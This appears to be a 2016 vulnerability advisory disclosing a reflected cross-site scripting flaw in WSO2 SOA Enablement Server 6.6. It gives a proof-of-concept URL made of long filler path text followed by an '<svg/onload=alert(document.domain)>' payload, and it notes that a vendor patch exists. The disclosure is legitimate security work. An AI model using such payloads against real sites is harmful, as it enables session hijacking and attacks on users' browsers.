Title: WSO2 SOA Enablement Server - Reflected Cross-Site Scripting Authors: Jakub Paaczyski, ukasz Juszczyk Date: 08. April 2016 Affected Software: ============= WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616 Probably other versions are also vulnerable. Proof of Concept: ============ PoC works only in IE browser - path is reflected in the response and needs to be long enough to bypass IE's 404 page substitution: https://host:6443/xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss <svg/onload=alert(document.domain)> Patch: ===== Vendor has already released patch for this issue.